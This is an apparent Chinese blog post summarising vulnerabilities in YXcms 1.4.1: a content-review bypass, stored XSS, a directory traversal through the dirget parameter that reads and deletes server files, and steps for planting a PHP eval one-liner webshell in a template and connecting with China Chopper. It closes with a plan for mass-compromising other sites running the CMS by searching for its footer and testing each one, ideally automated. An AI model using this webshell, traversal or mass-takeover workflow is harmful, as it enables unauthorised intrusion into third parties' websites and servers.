YXcms1.4.1漏洞总结
YXcms是一个相当不错的、基于PHP和Mysql的CMS系统,我给某单位做的官网就使用了这个CMS系统。用phithon的话来说,这个CMS系统的安全性是中上的。YXcms确实没有很幼稚的安全问题,但还是存在不少问题,总结如下。测试版本是1.4.1。
- 逻辑漏洞
开放注册时,用户发布的资讯需要经过管理员审核才能发表。但一旦经过审核,用户再次修改资讯,便不再需要审核了。恶意用户可注册账号,先发布合法的资讯,通过审核后再修改为非法有害的。
-
存储型Xss漏洞
- 用户发布的资讯中可嵌入JavaScript脚本,虽然会被过滤,但这个过滤是发生在前端的,有多种方法可绕过,如用Burp拦截修改资讯的数据包,让后修改资讯正文内容,插入JavaScript脚本。
- 管理员在后台发布的资讯不做检查,可直接嵌入JavaScript脚本
- 管理首页-网站配置 中 ICP备案号 等多个表单字段均存在Xss漏洞,无需变形,可直接利用
- 目录遍历-删除文件
上传文件管理处存在目录遍历漏洞,修改:index.php?r=admin/files/index&dirget=%2Cextend 中dirget的值便可遍历服务器文件,可查看图片、.txt等文件内容,若有权限,还可删除文件。
-
进入管理后台后写入一句话木马的方式
利用编辑前台模板的功能,打开一个前台模板,在其中插入一句话木马,如:
<?php @eval($_POST[value]);?>
然后找到使用这个模板的页面,在菜刀中输入这个页面的网址即可。每个页面都用到的模板是layout.php,但把木马插入到这个文件里被发现的概率也比较高。
-
批量拿站思路
- 先下载某CMS源码,研究其漏洞,找到从拿后台权限到拿webshell的一系列漏洞
- 再百度 Power by XXcms,找到使用该CMS的网站们
- 逐个测试,是否有漏洞,若有则拿下
- 最好能自动化